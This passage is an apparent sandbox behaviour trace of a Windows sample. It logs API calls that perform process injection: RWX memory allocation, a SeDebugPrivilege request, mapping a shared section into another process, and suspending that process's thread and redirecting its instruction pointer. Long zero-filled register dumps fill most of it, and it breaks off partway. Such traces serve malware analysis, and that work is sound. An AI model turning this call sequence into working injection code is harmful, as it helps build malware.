0x7662b712 [0066.263] EnumThreadWindows (dwThreadId=0xb88, lpfn=0x12dc7a, lParam=0x7662b2f4) returned 0 [0066.263] DestroyWindow (hWnd=0x601a8) returned 1 [0066.263] DefWindowProcA (hWnd=0x601a8, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0066.264] SendMessageA (hWnd=0x601a8, Msg=0x80, wParam=0x0, lParam=0x0) returned 0x80175 [0066.264] DefWindowProcA (hWnd=0x601a8, Msg=0x80, wParam=0x0, lParam=0x0) returned 0x80175 [0066.264] DestroyCursor (hCursor=0x80175) returned 1 [0066.264] SelectObject (hdc=0x2a0107b2, h=0x18a002e) returned 0x220a080f [0066.264] DefWindowProcA (hWnd=0x601a8, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0066.264] SelectObject (hdc=0x2a0107b2, h=0x18a002e) returned 0x18a002e [0066.264] SelectObject (hdc=0x2a0107b2, h=0x1b00016) returned 0x2430092c [0066.265] DeleteObject (ho=0x2430092c) returned 1 [0066.265] SelectObject (hdc=0x2a0107b2, h=0x1900015) returned 0x1900015 [0066.265] SelectObject (hdc=0x2a0107b2, h=0x1900015) returned 0x1900015 [0066.265] ReleaseDC (hWnd=0x601a8, hDC=0x2a0107b2) returned 1 [0066.265] DefWindowProcA (hWnd=0x601a8, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0066.265] UnmapViewOfFile (lpBaseAddress=0x400000) returned 1 [0066.267] VirtualAllocEx (hProcess=0xffffffff, lpAddress=0x400000, dwSize=0x2a000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0066.269] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x72940000, dwSize=0x120000, flNewProtect=0x40, lpflOldProtect=0x2200c00 | out: lpflOldProtect=0x2200c00*=0x2) returned 1 [0066.272] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x401000, dwSize=0x28a00, flNewProtect=0x20, lpflOldProtect=0x2200c00 | out: lpflOldProtect=0x2200c00*=0x40) returned 1 [0066.273] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x400000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x2200c00 | out: lpflOldProtect=0x2200c00*=0x40) returned 1 [0066.288] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x12f250 | out: HeapArray=0x12f250*=0x1c0000) 
returned 0x9 [0066.294] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0x12f200, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0066.295] NtCreateFile (in: FileHandle=0x12f220, DesiredAccess=0x120089, ObjectAttributes=0x12f1e8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x12f208, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x12f220*=0x120, IoStatusBlock=0x12f208*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0066.304] NtQueryInformationFile (in: FileHandle=0x120, IoStatusBlock=0x12f208, FileInformation=0x12f160, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x12f208, FileInformation=0x12f160) returned 0x0 [0066.319] NtReadFile (in: FileHandle=0x120, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x12f208, Buffer=0xa200020, BufferLength=0x13a928, ByteOffset=0x12f178*=0, Key=0x0 | out: IoStatusBlock=0x12f208, Buffer=0xa200020*) returned 0x0 [0066.343] NtClose (Handle=0x120) returned 0x0 [0066.385] NtQueryInformationFile (in: FileHandle=0x120, IoStatusBlock=0x12f1a8, FileInformation=0x12ef1c, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0x12f1a8, FileInformation=0x12ef1c) returned 0x0 [0066.385] NtClose (Handle=0x120) returned 0x0 [0066.616] NtQuerySystemInformation (in: SystemInformationClass=0x23, SystemInformation=0x12f234, Length=0x2, ResultLength=0x0 | out: SystemInformation=0x12f234, ResultLength=0x0) returned 0x0 [0066.620] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0x12f258, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x12f258, 
ReturnLength=0x0) returned 0x0 [0066.635] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x12eee8*=0x0, ZeroBits=0x0, RegionSize=0x12eeec*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x12eee8*=0x3b0000, RegionSize=0x12eeec*=0x10000) returned 0x0 [0066.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3b0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x3b0000, ResultLength=0x0) returned 0x0 [0066.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x12f248*=0x3b0000, RegionSize=0x12f24c, FreeType=0x8000) returned 0x0 [0066.662] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x12f004 | out: Value="BGC6u8Oy yXGxkR") returned 0x0 [0066.665] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x12f260 | out: TokenHandle=0x12f260*=0x120) returned 0x0 [0066.668] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x12f254 | out: lpLuid=0x12f254*(LowPart=0x14, HighPart=0)) returned 1 [0066.670] NtAdjustPrivilegesToken (in: TokenHandle=0x120, DisableAllPrivileges=0, NewState=0x12f250, BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 0x106 [0066.671] NtClose (Handle=0x120) returned 0x0 [0066.671] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x12e82c | out: Value="BGC6u8Oy yXGxkR") returned 0x0 [0066.679] RtlSetEnvironmentVariable (in: Environment=0x0, Name="664908S9", Value="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe" | out: Environment=0x0) returned 0x0 [0066.681] NtCreateSection (in: SectionHandle=0x12ed2c, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x12eacc, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x12ed2c*=0x120) returned 0x0 [0066.684] NtMapViewOfSection (in: SectionHandle=0x120, ProcessHandle=0xffffffff, 
BaseAddress=0x12ed30*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x12eacc*=0x29a00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x12ed30*=0x3b0000, SectionOffset=0x0, ViewSize=0x12eacc*=0x2a000) returned 0x0 [0066.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x12e434*=0x0, ZeroBits=0x0, RegionSize=0x12e438*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x12e434*=0x3e0000, RegionSize=0x12e438*=0x10000) returned 0x0 [0066.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x3e0000, ResultLength=0x0) returned 0x0 [0066.690] NtOpenProcess (in: ProcessHandle=0x12ea88, DesiredAccess=0x438, ObjectAttributes=0x12eaa8*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x12ea7c*(UniqueProcess=0x610, UniqueThread=0x0) | out: ProcessHandle=0x12ea88*=0x128) returned 0x0 [0066.692] NtOpenThread (in: ThreadHandle=0x12ea84, DesiredAccess=0x1a, ObjectAttributes=0x12e41c, ClientId=0x12e434*(UniqueProcess=0x0, UniqueThread=0x614) | out: ThreadHandle=0x12ea84*=0x12c) returned 0x0 [0066.696] NtSuspendThread (in: ThreadHandle=0x12c, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0066.699] NtGetContextThread (in: ThreadHandle=0x12c, Context=0x12e798 | out: Context=0x12e798*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, 
[24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x266ec70, Ebx=0x0, Edx=0x0, Ecx=0xf, Eax=0x27407d0, Ebp=0x1afaac, Eip=0x76f970b4, SegCs=0x1b, EFlags=0x246, Esp=0x1afa90, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, 
[118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, 
[299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, 
[480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0066.699] NtCreateSection (in: SectionHandle=0x12e424, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x12e3e4, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x12e424*=0x130) returned 0x0 [0066.699] NtMapViewOfSection (in: SectionHandle=0x130, ProcessHandle=0xffffffff, BaseAddress=0x12e42c*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x12e3e4*=0x15fa00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x12e42c*=0xa200000, SectionOffset=0x0, ViewSize=0x12e3e4*=0x160000) returned 0x0 [0066.699] NtMapViewOfSection (in: SectionHandle=0x130, ProcessHandle=0x128, BaseAddress=0x12e428*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x12e420*=0x15fa00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x12e428*=0x6240000, SectionOffset=0x0, ViewSize=0x12e420*=0x160000) returned 0x0 [0067.277] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0xa200000) returned 0x0 [0067.285] NtClose (Handle=0x130) returned 0x0 [0067.289] NtSetContextThread (ThreadHandle=0x12c, Context=0x12e798*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, 
[19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x266ec70, Ebx=0x0, Edx=0x0, Ecx=0xf, Eax=0x27407d0, Ebp=0x1afaac, Eip=0x630dba7, SegCs=0x1b, EFlags=0x246, Esp=0x1afa90, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, 
[114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, 
[295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, 
